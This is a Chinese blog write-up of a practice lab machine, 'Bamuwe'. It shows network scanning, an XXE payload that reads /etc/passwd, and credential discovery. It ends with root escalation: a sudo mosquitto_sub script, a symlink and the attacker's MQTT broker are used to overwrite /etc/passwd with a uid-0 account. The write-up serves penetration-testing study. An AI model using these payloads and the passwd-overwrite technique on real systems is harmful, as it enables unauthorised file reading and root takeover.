lvzhouhang

群友机-Bamuwe

  • ~3.34K 字
  1. 1. 信息搜集
  2. 2. 80端口
  3. 3. 提权

信息搜集

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27:38:e9:13       PCS Systemtechnik GmbH
192.168.31.171  08:00:27:59:20:9a       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.396 seconds (106.84 hosts/sec). 3 responded
1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.171
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-30 03:50 EDT
Nmap scan report for 192.168.31.171
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:59:20:9A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.80 seconds

80端口

前端有一段注释

1
2
3
4
5
6
7
8
9
<!-- XML STRUCTURE EXAMPLE -->
<!--
<user>
  <name>John Doe</name>
  <tel>123-4567890</tel>
  <email>admin@admin.com</email>
  <password>secret123</password>
</user>
-->

很明显的xxe提示

1
2
3
4
5
6
7
8
9
<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
 <user>
          <name>John Doe</name>
          <tel>123-4567890</tel>
          <email>&xxe;</email>
          <password>secret123</password>
        </user>

可以读取到文件,知道有一个welcome用户,可以直接读取user.txt

提权

读取/home/welcome/.viminfo,他告诉你要去读取pass.txt,pass.txt里告诉了welcome的密码,ssh登录

1
2
3
4
5
6
welcome@Bamuwe:~$ sudo -l
Matching Defaults entries for welcome on Bamuwe:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on Bamuwe:
    (ALL) NOPASSWD: /opt/sub.sh
1
2
welcome@Bamuwe:~$ cat /opt/sub.sh
/usr/bin/mosquitto_sub "$@" > /home/welcome/sub.log

mosquitto是一个消息代理软件mosquitto_sub是用来订阅的,对应的是

mosquitto_pub

参考连接

在kali上修改mosquitto的配置文件

1
2
┌──(root㉿kali)-[~/Desktop/tmp]
└─# vim /etc/mosquitto/mosquitto.conf

添加

1
2
3
4
listener 1883
bind_address 0.0.0.0
allow_anonymous true
password_file /etc/mosquitto/pwflie.example

然后启动服务

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/Desktop/tmp]
└─# mosquitto
1746003305: mosquitto version 2.0.21 starting
1746003305: Using default config.
1746003305: Starting in local only mode. Connections will only be possible from clients running on this machine.
1746003305: Create a configuration file which defines a listener to allow remote access.
1746003305: For more details see https://mosquitto.org/documentation/authentication-methods/
1746003305: Opening ipv4 listen socket on port 1883.
1746003305: Opening ipv6 listen socket on port 1883.
1746003305: mosquitto version 2.0.21 running

如果端口没有监听0.0.0.0的话可以用socat将1883转发出来

然后再welcome的家目录创建一个软连接,指向/etc/passwd

1
welcome@Bamuwe:~$ ln -sf /etc/passwd sub.log

将靶机里的/etc/passwd文件复制一份,添加一条用户信息

1
ll:$1$Zg12rJZk$P7IV1RqAT005RKjprDSo41:0:0:root:/root:/bin/bash
1
2
3
4
┌──(root㉿kali)-[~/Desktop/tmp]
└─# mosquitto_pub -t test -f passwd

welcome@Bamuwe:~$ sudo /opt/sub.sh -h 192.168.31.129 -p 1884 -t test

然后/etc/passwd就被覆盖了

1
welcome@Bamuwe:~$ su - ll

密码是123123

提权成功

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
赞助喵
非常感谢您的喜欢!
赞助喵
分享这一刻
让朋友们也来瞅瞅!